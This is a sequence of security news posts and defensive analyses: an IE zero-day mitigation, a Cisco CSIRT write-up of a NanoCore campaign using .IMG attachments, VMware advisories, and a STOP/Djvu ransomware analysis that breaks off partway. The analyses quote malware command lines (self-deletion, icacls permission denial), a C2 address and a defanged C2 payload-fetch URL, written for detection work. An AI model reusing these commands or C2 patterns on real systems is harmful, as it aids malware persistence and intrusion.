The popular researcher Victor Gevers, the founder of the GDI Foundation, analyzed the list and confirmed it was composed of more than 8200 unique IP addresses, about 2.174 are accessible via Telnet with the leaked credentials.

Pierluigi Paganini

(SecurityAffairs – Telnet credentials, hacking)

The post Bot list with Telnet credentials for more than 500,000 servers and IoT devices leaked online appeared first on Security Affairs.

Microsoft provides mitigation for actively exploited CVE-2020-0674 IE Zero-Day

Microsoft published a security advisory to warn of an Internet Explorer (IE) zero-day vulnerability (CVE-2020-0674) that is currently being exploited in the wild.

Microsoft has published a security advisory (ADV200001) that includes mitigations for a zero-day remote code execution (RCE) vulnerability, tracked as CVE-2020-0674, affecting Internet Explorer.

The tech giant confirmed that the CVE-2020-0674 zero-day vulnerability has been actively exploited in the wild.

“A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.” reads the advisory published by Microsoft. “An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.”

An attacker could exploit the flaw to can gain the same user permissions as the user logged into the compromised Windows device. If the user is logged on with administrative permissions, the attacker can exploit the flaw to take full control of the system.

The CVE-2020-0674 flaw could be triggered by tricking victims into visiting a website hosting a specially crafted content designed to exploit the issue through Internet Explorer.

Microsoft announced that it is currently working on a patch to address the vulnerability, the company will likely release an out-of-band update because attackers are already exploiting the flaw in the wild.

Microsoft suggests restricting access to JScript.dll using the following workaround to mitigate this zero-day flaw.

For 32-bit systems, enter the following command at an administrative command prompt:

    takeown /f %windir%\system32\jscript.dll
    cacls %windir%\system32\jscript.dll /E /P everyone:N

For 64-bit systems, enter the following command at an administrative command prompt:

    takeown /f %windir%\syswow64\jscript.dll
    cacls %windir%\syswow64\jscript.dll /E /P everyone:N
    takeown /f %windir%\system32\jscript.dll
    cacls %windir%\system32\jscript.dll /E /P everyone:N

The company warns that implementing these mitigation might impact the functionality for components or features that use the jscript.dll.

“Implementing these steps might result in reduced functionality for components or features that rely on jscript.dll. To be fully protected, Microsoft recommends the update be installed as soon as possible. Please revert the mitigation steps before installing the update to return to a full state.” continues the advisory.

To undo the workaround, use the following procedures.

For 32-bit systems, enter the following command at an administrative command prompt:

    cacls %windir%\system32\jscript.dll /E /R everyone    

For 64-bit systems, enter the following command at an administrative command prompt:

    cacls %windir%\system32\jscript.dll /E /R everyone    
    cacls %windir%\syswow64\jscript.dll /E /R everyone

Pierluigi Paganini

(SecurityAffairs – CVE-2020-0674, hacking)

The post Microsoft provides mitigation for actively exploited CVE-2020-0674 IE Zero-Day appeared first on Security Affairs.

Chinese police arrested the operator of unauthorized VPN service that made $1.6 million from his activity

Chinese authorities continue operations against unauthorized VPN services that are very popular in the country.

China continues to intensify the monitoring of the cyberspace applying and persecution of VPN services that could be used to bypass its censorship system known as the Great Firewall.

The Great Firewall project already blocked access to more hundreds of the world’s 1,000 top websites, including Google, Facebook, Twitter, and Dropbox.

Since early 2019, the Chinese authorities have started banning “unauthorized” VPN services, any company offering such type of service in the country must obtain an appropriate license from the government.

In December, the Chinese authorities have sentenced a man to five-and-a-half years in prison for selling a VPN service without the authorization.

According to an announcement from China’s Procuratorate Daily the man was also fined 500,000 yuan ($76,000). Prosecutors said the man was convicted of collecting “illegal revenue” of 792,638 yuan ($120,500) from his unauthorized activity.

Now media reports a new arrest made by Chinese authorities in the city of Taizhou, the police arrested a man with the pseudonym of Gao (29) that successfully operated VPN service since mid-2016. Gao has made more than 11 million Chinese yuan ($1.6 million) from renting access to VPN servers to more than 28,000 regular customers, he pleaded guilty in 2019 and is still awaiting the final sentence.

In December 2017, Chinese authorities sentenced a man from Dongguan to nine months in prison for operating a VPN service that allowed him to earn $2,000. Other criminal cases were reported by Chinese authorities in the following months, blocked services had thousands of customers in the country.

In July 2019, in compliance with the Chinese Internet monitoring law, Apple has started removing all IOS VPN apps from it App Store in China.

Pierluigi Paganini

(SecurityAffairs – Chinese authorities, privacy)

The post Chinese police arrested the operator of unauthorized VPN service that made $1.6 million from his activity appeared first on Security Affairs.

This Week in Security News: The First Patch Tuesday Update of 2020 and Pwn2Own Vancouver Announced

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about a major crypto-spoofing bug impacting Windows 10 that has been fixed as part of Microsoft’s January Patch Tuesday update. Also, read about the launch of Pwn2Own Vancouver, where it will pay to hack a Tesla Model 3.

Read on:

Can You Hack a Tesla Model 3? $500,000 Says That You Can’t

Trend Micro’s Zero Day Initiative (ZDI) has officially announced that its Pwn2Own Vancouver competition will be hosted at CanSecWest March 18-20. This time, the stakes have been upped in the automotive category: the hacker who can evade the multiple layers of security found in a Tesla Model 3 to pull off a complete vehicle compromise will win a $500,000 prize and a new Tesla Model 3.

Texas School District Loses $2.3 Million to Phishing Scam, BEC

Manor Independent School District (MISD) in Texas is investigating an email phishing attack after a series of seemingly normal school-vendor transactions resulted in the loss of an estimated $2.3 million. According to the statement posted on Twitter, the district is cooperating with the Manor Police Department and the Federal Bureau of Investigation (FBI).

Equifax Settles Class-Action Breach Lawsuit for $380.5M

A Georgia court granted final approval for an Equifax settlement in a class-action lawsuit, after the credit-reporting agency was hit by its massive 2017 data breach. This week, the Atlanta federal judge reportedly ruled that Equifax will pay $380.5 million to settle lawsuits regarding the breach.

Sodinokibi Ransomware Increases Year-End Activity, Targets Airport and Other Businesses

The Sodinokibi ransomware, detected as Ransom.Win32.SODINOKIBI,was involved in several high-profile attacks in 2019. The ransomware ended the year by launching a new round of attacks aimed at multiple organizations, including the Albany International Airport and the foreign exchange company Travelex.

ICS Security in the Spotlight Due to Tensions with Iran

Given the heightened tensions between the U.S. and Iran, organizations with connected industrial infrastructure should be on guard. In the wake of the assassination, several cybersecurity experts and U.S. government officials have warned of the ICS security risk that Iran-affiliated adversaries pose. Others point to the likelihood of smaller cyberattacks designed to distract rather than prompt retaliation.

Dymalloy, Electrum, and Xenotime Hacking Groups Set Their Targets on US Energy Sector

At least three hacking groups have been identified aiming to interfere with power grids across the United States. The oil, gas, water and energy industries have proved to become a valuable target for threat actors looking to compromise ICS environments, and according to a report on the state of industrial control systems (ICSs), attempts in attacking the utilities industry are on the rise.

Microsoft Patches Major Crypto Spoofing Bug

A major crypto-spoofing bug impacting Windows 10 users has been fixed as part of Microsoft’s January Patch Tuesday security bulletin. The vulnerability could allow an attacker to spoof a code-signing certificate, vital to validating executable programs in Windows, and make it appear as if an application was from a trusted source.

Mobile Banking Trojan FakeToken Resurfaces, Sends Offensive Messages Overseas from Victims’ Accounts

Researchers recently discovered an updated version of the mobile banking trojan FakeToken after detecting 5,000 smartphones sending offensive text messages overseas. Once the malware infects an unprotected Android device, FakeToken is able to send and intercept text messages such as 2FA codes or tokens, as well as scan through the victim’s contacts to possibly send phishing messages.

Report: Chinese Hacking Group APT40 Hides Behind Network of Front Companies

An online group of cybersecurity analysts calling themselves “Intrusion Truth” doxed their fourth Chinese state-sponsored hacking operation. After previously exposing details about Beijing’s hand in APT3 (believed to operate out of the Guangdong province), APT10 (Tianjin province), and APT17 (Jinan province), Intrusion Truth has now begun publishing details about China’s cyber apparatus in the state of Hainan, an island in the South China Sea.

What are your thoughts on the major crypto-spoofing bug that was found by the NSA? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: The First Patch Tuesday Update of 2020 and Pwn2Own Vancouver Announced appeared first on .

Get in the Security Fast Lane with a Stealthwatch and Encrypted Traffic Analytics Test Drive!

As businesses continue to move towards a more digital future, the threats they face continue to become more complex. As many organizations continue to embrace the benefits of cloud, IoT, and an increasingly mobile workforce, threat actors are taking advantage of these attack vectors to work their way into your business.

Cisco Stealthwatch provides comprehensive network-wide visibility and security analytics, so you can stay ahead of attackers and expose their locations and behaviors to help you prevent a security event from becoming a full-blown breach. Today, we’re happy to announce that you’ll have the chance to get behind the wheel and give Stealthwatch a live test drive!

Before they become customers, many organizations we work with have never experienced what it’s like to gain insight into their networks and how they might use the power of behavioral analytics and machine learning to detect threats. Fortunately, Stealthwatch test drives are the perfect way to gain first-hand experience with Stealthwatch and how you can use its capabilities to do just that.

The Cisco Stealthwatch Test Drive provides users with access to a fully configured environment with traffic that you generate to test first hand live use cases including:

  • Breach Detection
  • Insider and Advanced Threat Detection
  • High Risk Application Detection
  • Policy Violations
  • Encrypted Traffic Analytics

Attendees will get to experience life-like cyber security attack situations in a virtualized lab environment, playing the role of both attacker and defender. Operating in an environment similar to many large, complex networks, you will learn how an environment can become compromised, how security breaches are detected, and how to respond to these threats using Stealthwatch. Completing these labs will provide you with test plans to effectively operationalize Stealthwatch.

Whether you’re new to Stealthwatch and interested in trying the product for the first time, or a long-time customer, the Cisco Stealthwatch Test Drive Labs are a great way to see all of the detections and integrations that Stealthwatch can do for your organization and help you tailor your product experience to your network and security needs.

To see a schedule of upcoming Cisco Stealthwatch Test Drive Labs, be sure to visit: https://www.cisco.com/c/en/us/products/security/stealthwatch-test-drive.html

To learn more about Stealthwatch, please visit: https://www.cisco.com/go/stealthwatch

The post Get in the Security Fast Lane with a Stealthwatch and Encrypted Traffic Analytics Test Drive! appeared first on Cisco Blogs.

Disk Image Deception

Cisco’s Computer Security Incident Response Team (CSIRT) detected a large and ongoing malspam campaign leveraging the .IMG file extension to bypass automated malware analysis tools and infect machines with a variety of Remote Access Trojans. During our investigation, we observed multiple tactics, techniques, and procedures (TTPs) that defenders can monitor for in their environments. Our incident response and security monitoring team’s analysis on a suspicious phishing attack uncovered some helpful improvements in our detection capabilities and timing.

In this case, none of our intelligence sources had identified this particular campaign yet. Instead, we detected this attack with one of our more exploratory plays looking for evidence of persistence in the Windows Autoruns data. This play was successful in detecting an attack against a handful of endpoints using email as the initial access vector and was able to evade our defenses at the time. Less than a week after the incident, we received alerts from our retrospective plays for this same campaign once our integrated threat intelligence sources delivered the indicators of compromise (IOC). This blog is a high level write-up of how we adapted to a potentially successful attack campaign and our tactical analysis to help prevent and detect future campaigns. 

(This blog was co-authored by Jeff Bollinger & William Sheldon)

Incident Response Techniques and Strategy

The Cisco Computer Security and Incident Response Team (CSIRT) monitors Cisco for threats and attacks against our systems, networks, and data. The team provides around the globe threat detection, incident response, and security investigations. Staying relevant as an IR team means continuously developing and adapting the best ways to defend the network, data, and infrastructure. We’re constantly experimenting with how to improve the efficiency of our data-centric playbook approach in the hope it will free up more time for threat hunting and more in-depth analysis and investigations. Part of our approach has been that as we discover new methods for detecting risky activity, we try to codify those methods and techniques into our incident response monitoring playbook to keep an eye on any potential future attacks.

Although some malware campaigns can slip past the defenses with updated techniques, we preventatively block the well-known, or historical indicators and leverage broad, exploratory analysis playbooks that spotlight more on how attackers operate and infiltrate. In other words, there is value in monitoring for the basic atomic indicators of compromised like IP addresses, domain names, file hashes, etc. but to go further you really have to look broadly at more generic attack techniques. These playbooks, or plays, help us find out about new attack campaigns that are possibly targeted and potentially more serious. While some might label this activity “threat hunting”, this data exploration process allows us to discover, track, and potentially share new indicators that get exposed during a deeper analysis. 

Defense in depth demands that we utilize additional data sources in case attackers successfully evade one or more of our defenses, or if they were able to obscure their malicious activities enough to avoid detection. Recently we discovered a malicious spam campaign that almost succeeded due to a missed early detection. In one of our exploratory plays, we use daily diffs for all the Microsoft Windows registry autorun key changes since the last boot. Known as “Autoruns“, this data source ultimately helped us discover an ongoing attack that was attempting to deliver a remote access trojan (RAT). Along with the more mundane Windows event logs, we pieced together the attack from the moment it arrived and made some interesting discoveries on the way — most notably how the malware seemingly slipped past our front line filters. Not only did we uncover many technical details about the campaign, but we also used it as an opportunity to refine our incident response detection techniques and some of our monitoring processes.

IMG File Format Analysis

.IMG files are traditionally used by disk image files to store raw dumps of either a magnetic disk or of an optical disc. Other disk image file formats include ISO and BIN. Previously, mounting disk image file files on Windows required the user to install third-party software. However Windows 8 and later automatically mount IMG files on open. Upon mounting, Windows File Explorer displays the data inside the .IMG file to the end user. Although disk image files are traditionally utilized for storing raw binary data, or bit-by-bit copies of a disk, any data could be stored inside them. Because of the newly added functionality to the Windows core operating system, attackers are abusing disk image formats to “smuggle” data past antivirus engines, network perimeter defenses, and other auto mitigation security tooling. Attackers have also used the capability to obscure malicious second stage files hidden within a filesystem by using ISO and DMG (to a lesser extent). Perhaps the IMG extension also fools victims into considering the attachment as an image instead of a binary pandora’s box.

Know Where You’re Coming From

As phishing as an attack vector continues to grow in popularity, we have recently focused on several of our email incident response plays around detecting malicious attachments, business email compromise techniques like header tampering or DNS typosquatting, and preventative controls with inline malware prevention and malicious URL rewriting.

Any security tool that has even temporarily outdated definitions of threats or IOCs will be unable to detect a very recent event or an event with a recent, and therefore unknown, indicator. To ensure that these missed detections are not overlooked, we take a retrospective look back to see if any newly observed indicators are present in any previously delivered email. So when a malicious attachment is delivered to a mailbox, if the email scanners and sandboxes do not catch it the first time, our retrospective plays look back to see if the updated indicators are triggered. Over time sandboxes update their detection abilities and previously “clean” files could change status. The goal is to detect this changing status and if we have any exposure, then we reach out and remediate the host.

 

This process flow shows our method for detecting and responding to updated verdicts from sandbox scanners. During this process we collect logs throughout to ensure we can match against hashes or any other indicator or metadata we collect: 

Retrospective Email Detection Incident Response

Figure 1: Flow chart for Retrospective alerting

This process in combination with several other threat hunting style plays helped lead us to this particular campaign. The IMG file isn’t unique by any means but was rare and stood out to our analysts immediately when combined with the file name as a fake delivery invoice – one of the more tantalizing and effective types of phishing lures.

Incident Response and Analysis

We needed to pull apart as much of the malicious components as possible to understand how this campaign worked and how it might have slipped our defenses temporarily. The process tree below shows how the executable file dropped from the original IMG file attachment after mounting led to a Nanocore installation:

Analysis Behavior Graph

Figure 2: Visualization of the malicious process tree.

 

Autoruns

As part of our daily incident response playbook operations, we recently detected a suspicious Autoruns event on an endpoint. This log (Figure 2) indicated that an unsigned binary with multiple detections on the malware analysis site, VirusTotal, had established persistence using the ‘Run’ registry key. Anytime the user logged in, the binary referenced in the “run key” would automatically execute – in this case the binary called itself “filename.exe” and dropped in the typical Windows “%SYSTEMROOT%\%USERNAME%\AppData\Roaming” directory:

{

    "enabled": "enabled",

    "entry": "startupname",

    "entryLocation": "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",

    "file_size": "491008",

    "hostname": "[REDACTED]",

    "imagePath": "c:\\users\\[REDACTED]\\appdata\\roaming\\filename.exe",

    "launchString": "C:\\Users\\[REDACTED]\\AppData\\Roaming\\filename.exe",

    "md5": "667D890D3C84585E0DFE61FF02F5E83D",

    "peTime": "5/13/2019 12:48 PM",

    "sha256": "42CCA17BC868ADB03668AADA7CF54B128E44A596E910CFF8C13083269AE61FF1",

    "signer": "",

    "vt_link": "https://www.virustotal.com/file/42cca17bc868adb03668aada7cf54b128e44a596e910cff8c13083269ae61ff1/analysis/1561620694/",

    "vt_ratio": "46/73",

    "sourcetype": "autoruns",

}


Figure 3: Snippet of the event showing an unknown file attempting to persist on the victim host

Many of the anti-virus engines on VirusTotal detected the binary as the NanoCore Remote Access Trojan (RAT), a well known malware kit sold on underground markets which enables complete control of the infected computer: recording keystrokes, enabling the webcam, stealing files, and much more. Since this malware poses a huge risk and the fact that it was able to achieve persistence without getting blocked by our endpoint security, we prioritized investigating this alert further and initiated an incident. 

Once we identified this infected host using one of our exploratory Autoruns plays, the immediate concern was containing the threat to mitigate as much potential loss as possible. We download a copy of the dropper malware from the infected host and performed additional analysis. Initially we wanted to confirm if other online sandbox services agreed with the findings on VirusTotal. Other services including app.any.run also detected Nanocore based on a file called run.dat being written to the %APPDATA%\Roaming\{GUID} folder as shown in Figure 3: 

app.any.run analysis

Figure 4: app.any.run analysis showing Nanocore infection

The sandbox report also alerted us to an unusual outbound network connection from RegAsm.exe to 185.101.94.172 over port 8166.

Now that we were confident this was not a false positive, we needed to find the root cause of this infection, to determine if any other users are at risk of being victims of this campaign. To begin answering this question, we pulled the Windows Security Event Logs from the host using our asset management tool to gain a better understanding of what occurred on the host at the time of the incident. Immediately, a suspicious event that was occurring every second  jumped out due to the unusual and unexpected activity of a file named “DHL_Label_Scan _ June 19 2019 at 2.21_06455210_PDF.exe” spawning the Windows Assembly Registration tool RegAsm.exe. 

Process Information:

 New Process ID:  0x4128

 New Process Name: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

 Token Elevation Type: %%1938

 Mandatory Label:  Mandatory Label\Medium Mandatory Level

 Creator Process ID: 0x2ba0

 Creator Process Name: \Device\CdRom0\DHL_Label_Scan _  June 19 2019 at 2.21_06455210_PDF.exe

 Process Command Line: "C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"



 Figure 5: New process spawned from a ‘CdRom0’ device (the fake .img) calling the Windows Assembly Registration tool

This event stands out for several reasons.

  • The filename:
    1. Attempts to social engineer the user into thinking they are executing a PDF by appending “_PDF”
    2. “DHL_Label_Scan” Shipping services are commonly spoofed by adversaries in emails to spread malware.
  • The file path:
    1. \Device\CdRom0\ is a special directory associated with a CD-ROM that has been inserted into the disk drive.
    2. A fake DHL label is a strange thing to have on a CD-ROM and even stranger to insert it to a work machine and execute that file.
  • The process relationship:
    1. Adversaries abuse the Assembly Registration tool “RegAsm.exe” for bypassing process whitelisting and anti-malware protection.
    2. MITRE tracks this common technique as T1121 indicating, “Adversaries can use Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Both utilities may be used to bypass process whitelisting through use of attributes within the binary to specify code that should be run before registration or unregistration”
    3. We saw this technique in the app.any.run sandbox report.
  • The frequency of the event:
    1. The event was occurring every second, indicating some sort of command and control or heartbeat activity.

 

Mount Up and Drop Out

 

At this point in the investigation, we have now uncovered a previously unseen suspicious file: “DHL_Label_Scan _  June 19 2019 at 2.21_06455210_PDF.exe”, which is strangely located in the \Device\CdRom0\ directory, and the original “filename.exe” used to establish persistence.

The first event in this process chain shows explorer.exe spawning the malware from the D: drive.

Process Information:

 New Process ID:  0x2ba0

 New Process Name: \Device\CdRom0\DHL_Label_Scan _  June 19 2019 at 2.21_06455210_PDF.exe

 Token Elevation Type: %%1938

 Mandatory Label:  Mandatory Label\Medium Mandatory Level

 Creator Process ID: 0x28e8

 Creator Process Name: C:\Windows\explorer.exe

 Process Command Line: "D:\DHL_Label_Scan _  June 19 2019 at 2.21_06455210_PDF.exe"

Figure 6: Additional processes spawned by the fake PDF

 

The following event is the same one that originally caught our attention, which shows the malware spawning RegAsm.exe (eventually revealed to be Nanocore) to establish communication with the command and control server:

 

Process Information:

 New Process ID:  0x4128

 New Process Name: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

 Token Elevation Type: %%1938

 Mandatory Label:  Mandatory Label\Medium Mandatory Level

 Creator Process ID: 0x2ba0

 Creator Process Name: \Device\CdRom0\DHL_Label_Scan _  June 19 2019 at 2.21_06455210_PDF.exe

 Process Command Line: "C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

Figure 7: RegAsm reaching out to command and control servers

 

Finally, the malware spawns cmd.exe and deletes the original binary using the built-in choice command: 

Process Information:

 New Process ID:  0x2900

 New Process Name: C:\Windows\SysWOW64\cmd.exe

 Token Elevation Type: %%1938

 Mandatory Label:  Mandatory Label\Medium Mandatory Level

 Creator Process ID: 0x2ba0

 Creator Process Name: \Device\CdRom0\DHL_Label_Scan _  June 19 2019 at 2.21_06455210_PDF.exe

 Process Command Line: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "D:\DHL_Label_Scan _  June 19 2019 at 2.21_06455210_PDF.exe"

 

Figure 8: Evidence of deleting the original dropper.

 

At this point in the investigation of the original dropper and the subsequent suspicious files, we still could not answer how the malware ended up on this user’s computer in the first place. However with the filename of the original dropper to pivot with, a quick web search for the filename turned up a thread on Symantec.com from a user asking for assistance with the file in question. In this post, they write that they recognize the filename from a malspam email they received. Based on the Symantec thread and other clues, such as the use of the shipping service DHL in the filename, we now know the delivery method is likely via email.

Delivery Method Techniques

We used the following Splunk query to search our Email Security Appliance logs for the beginning of the filename we found executing RegAsm.exe in the Windows Event Logs.

index=esa earliest=-30d

[search index=esa "DHL*.img" earliest=-30d

| where isnotnull(cscoMID)

| fields + cscoMID,host

| format]

| transaction cscoMID,host

| eval wasdelivered=if(like(_raw, "%queued for delivery%"), "yes", "no")

| table esaTo, esaFrom, wasdelivered, esaSubject, esaAttachment, Size, cscoMID, esaICID, esaDCID, host

Figure 9: Splunk query looking for original DHL files.

As expected, the emails all came from the spoofed sender address noreply@dhl.com with some variation of the subject “Re: DHL Notification / DHL_AWB_0011179303/ ETD”. In total, CSIRT identified a total of 459 emails from this campaign sent to our users. Of those 459 emails, 396 were successfully delivered and contained 18 different Nanocore samples.

396 malicious emails making it past our well-tuned and automated email mitigation tools is no easy feat. While the lure the attacker used to social engineer their victims was common and unsophisticated, the technique they employed to evade defenses was successful – for a time.

Detecting the Techniques

During the lessons learned phase after this campaign, CSIRT developed numerous incident response detection rules to alert on newly observed techniques discovered while analyzing this incident. The first and most obvious being, detecting malicious disk image files successfully delivered to a user’s inbox. The false-positive rate for this specific type of attack is low in our environment, with a few exceptions here and there – easily tuned out based on the sender. This play could be tuned to look only for disk image files with a small file size if they are more prevalent in your environment.

Another valuable detection rule we developed after this incident is monitoring for suspicious usage (network connections) of the registry assembly executable on our endpoints, which is ultimately the process Nanocore injected itself into and was using to facilitate C2 communication. Also, it is pretty unlikely to ever see legitimate use of the choice command to create a self-destructing binary of sorts, so monitoring for execution of choice with the command-line arguments we saw in the Windows Event above should be a high fidelity alert.

Some additional, universal takeaways from this incident:

  1. Auto-mitigation tools should not be treated as a silver bullet – Effective security monitoring, rapid incident response, and defense in depth/layers is more important.
  2. Obvious solutions such as blocking extensions at email gateway are not always realistic in large, multifunction enterprises – .IMG files were legitimately being used by support engineers and could not be blocked.
  3. Malware campaigns can slip right past defenders on occasion, so a wide playbook that focuses on how attackers operate and infiltrate (TTPs) is key for finding new and unknown malware campaigns in large enterprises (as opposed to relying exclusively on indicators of compromise.)

 

Indicators Of Compromise (IOCS)

2b6f19fac64c847258fe776a2ea6444cc469ac6a348e714fcab23cc6cb2c5b74

327c646431a644192aae8a0d0ebe75f7a2b98d7afa7a446afa97e2a004ca64b0

3718957d7f0da489935ce35b6587a6c93f25cff69d233381131b757778826da3

3873ef89a74a9c03ba363727b20429a45f29a525532d0ef9027fce2221f64f60

3a7c23a01a06c257b2f5b59647461ebf8f58209a598390c2910d20a9c5757c62

4eb2af63e121c22df7945258991168be4a70aa32669db173743701aab94383fb

5d14e5959c05589978680e46bffd586e10c1fcabc21ddd94c713520cd0037640

6a2af44e186531d07c53122d42280bc18929d059b98f0449c1a646d66a778ffb

80ab695da86e97861b294b72ba1ef2e8e2f322e7ec0d0834e71f92497515b63d

a34aa05710cf0afb111181c23468c2dcc3a2c2d6aa496c9dffe45dde11e2c4d1

abf41ea1909a39c644e5b480b176ef8a3c4a80e2ee8b447d4320e777384392cf

af5d9ca1ed166a8d378c5b5ed7e187035f374b4376bdd632c3a2ee156613fd29

afb87da69c9ad418ac29af27602a450a7eae63132443c7bc56ab17785dd3bbfd

d871704baad496b47b15da54e7766c0a468ac66337d99032908ad7d4732ecffb

da79495b8b75c9b122a1116494f68661ec45a1fdfb8fd39c000f1f691b39bc13

deb805ce329f17a48165328879b854674eb34abd704eeb575e643574f31d3e83

eaee0577806861c23bef8737e5ba2d315e9c6bfa38bf409dda9a2a13599615b4

fc0cf381e433cd578128be91dfd7567d2294a6d3ff4d2ce0e3f4046442b1f5f0

185.101.94.172:8166

The post Disk Image Deception appeared first on Cisco Blogs.

VMware addresses flaws in VMware Tools and Workspace ONE SDK

VMware has released security updates to address a local privilege escalation vulnerability in VMware Tools version 10 for Windows.

VMware has released VMware Tools 11.0.0 that addresses a local privilege escalation issue in Tools 10.x.y tracked as CVE-2020-3941. The issue, classified as a race condition flaw that could be exploited by an attacker to access the guest virtual machine to escalate privileges.

“A malicious actor on the guest VM might exploit the race condition and escalate their privileges on a Windows VM. This issue affects VMware Tools for Windows version 10.x.y as the affected functionality is not present in VMware Tools 11.” reads the advisory published by the company.

The vulnerability has been assigned an important severity rating and a CVSS score of 7.8. The company also suggests a workaround in case users cannot upgrade their version.

“However, if upgrading is not possible, exploitation of this issue can be prevented by correcting the ACLs on C:\ProgramData\VMware\VMware CAF directory in the Windows guests running VMware Tools 10.x.y versions. In order to correct ACLs for this directory, remove all write access permissions for Standard User from the directory,” reads Workaround for VMware Tools for Windows security vulnerability (CVE-2020-3941) (76654).

Recently the virtualization giant also disclosed an information disclosure issue, tracked as CVE-2020-3940, that affects Workspace ONE SDK and dependent iOS and Android mobile applications.

Vulnerable applications do not properly handle certificate verification failures if SSL pinning is enabled in the UEM Console.

“A sensitive information disclosure vulnerability in the VMware Workspace ONE SDK was privately reported to VMware.” states the security advisory.

“A malicious actor with man-in-the-middle (MITM) network positioning between an affected mobile application and Workspace ONE UEM Device Services may be able to capture sensitive data in transit if SSL Pinning is enabled.” 

The vulnerability has been assigned an important severity rating and a CVSS score of 6.8.

The list of vulnerable applications and SDKs include Workspace ONE Boxer, Content, Intelligent Hub, Notebook, People, PIV-D, Web, and the SDK plugins for Apache Cordova and Xamarin.

Pierluigi Paganini

(SecurityAffairs – VM, hacking)

The post VMware addresses flaws in VMware Tools and Workspace ONE SDK appeared first on Security Affairs.

STOP (Djvu) Ransomware: Ransom For Your Shady Habits!

Estimated reading time: 9 minutes

With almost 200 extensions, STOP (djvu) ransomware can be said to be 2019’s most active and widespread ransomware. Although this ransomware was active a year before, it started its campaign aggressively in early 2019. To evade detection, it has been continuously changing its extensions and payloads. For earlier infections, data recovery was easier if the key was not online CnC generated. Once payload was received, decryption was easier as it used non-symmetric encryption algorithms and for offline systems, it used the same set of keys. There has been a change in its encryption strategy from mid-2019, which made the decryption of infected files difficult. By observing continuous improvement in infection vectors and payloads, one can consider STOP actors to be one of the most active malware authors of 2019.

Here, we will discuss in detail about its behavior and updated file encryption technique. We will also go through its parallel activities of downloading other malware and their behavior. The statistics would elaborate its prominence in the last few months.

Infection Vectors:

According to our telemetry, this ransomware is seen spreading through cracked applications, keygens, activators, fake application setup and fake windows updates. While taking a look at the infection vectors and the ransom demanded, we can say that these actors believed in quantity instead of quality like Ryuk did. According to our observations, cracked files or fake activators for different software like Tally, Autocad, Adobe Photoshop, Internet Download Manager, Microsoft Office, Opera browser, VMware Workstation, Quick Heal Total Security, etc. were seen spreading this ransomware.

Payload Behaviour:

Fig. 1: ProcessMap

The main payload of STOP (djvu) has lots of anti-emulation and anti-debugging techniques implemented by its common wrapper, which is believed to be used for most of the payloads. Few of the ransomware are seen avoiding encryption for a particular set of countries, depending on the region of their origin and strength of victims to pay the ransom. For that, we have observed the use of keyboard layouts to identify the country of the victim system. Here, STOP authors did not rely on legacy techniques as there might be a chance of error. The payload checks for the location of the system by visiting “https[:]//api.2ip.ua/geo.json” where in response we get information about the location and timezone of the system.

In response to this request, details of location including longitude, latitude, timezone along with country and city are received.

Fig. 2: IP Response

The retrieved country code is compared with a few other country codes. If it matches with any of the listed country codes, the payload does not execute further. The image below shows the country code comparison before encryption.

Fig. 3: Country Code Comparison

Once it confirms that the victim is not from one of the enlisted countries, it creates a folder with UUID or GUID used as its name at directory “%AppData%\Local\”. After that, payload creates self-copy at this location and access controls of this file are changed using ‘icals’ by the following command:

“icacls \”%AppData%\\Local\\{UuId}\” /deny *S-1-1-0:(OI)(CI)(DE,DC)”

Where OI: Object Inherit, CI: Container Inherit, DE: Delete, DC: Delete Child

Again after this, payload runs itself from its original location by elevating access rights as admin using

<Directory Path>\ewrewexcf.exe –Admin IsNotAutoStart IsNotTask 

Further, it terminates the parent process. Parameters confirm that the process is neither initiated by autostart programs nor it is a scheduled task and is running as admin. This newly executed process creates a task scheduler entry using TaskSchedulerCOM at:

C:\Windows\System32\Tasks\Time Trigger Task

Fig. 4: Time Trigger Task

Then it retrieves the MAC address of the system using GetAdaptersInfo(). An MD5 hash of this MAC address is then calculated using Windows Crypto APIs and is then used to uniquely identify the system. A request is sent to malicious CnC using this MD5 hash, which gets RSA-2048 public key and system encryption identifier i.e. personal ID as a response.

Request format:

http://ring2[.]ug/As73yhsyU34578hxxx/SDf565g/get.php?pid={Mac Address_MD5}&first=true

This response is stored in %AppData%\Local\bowsakkdestx.txt. This key is further used in file encryption, which we will discuss later. Also, the ID received along with the public key is stored in C:\SystemID\PersonalID.txt for future reference.

While receiving personal ID and public key, the ransomware payload also downloads a couple of other malware from the CnC server. It consists of infamous info-stealer i.e. Vidar and a trojan payload which is similar to previously seen Vilsel.

Fig. 5: File Download Requests

In Fig.5, ‘5.exe’ was downloaded and it is one of the Vidar payloads, while ‘updatewin1.exe’ was Vilsel. The lateral activity of these components will be discussed later.

For persistence, along with time trigger task, it also creates one RUN registry entry:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run “SysHelper” = “%AppData%\Local\{UuId}\34efcdsax.exe” –AutoStart

It drops ransom note to the directories it has enumerated. Before start of encryption process, a mutex {1D6FC66E – D1F3 – 422C – 8A53 – C0BBCF3D900D} is created. This mutex is common throughout STOP-Djvu campaign.

It particularly checks for the presence of file I:\5d2860c89d774.jpg and if present, it encrypts this file.

File Encryption:

File encryption involves 2 types:

  • Encryption with Online Key
  • Encryption with Offline Key

In the first scenario, payload tries to establish a connection with CnC by sending a request for server-generated public key and ID using the associated MD5 hash of the system’s MAC address. The response is saved in bowsakkdestx.txt. For encryption, this key is used in the future.

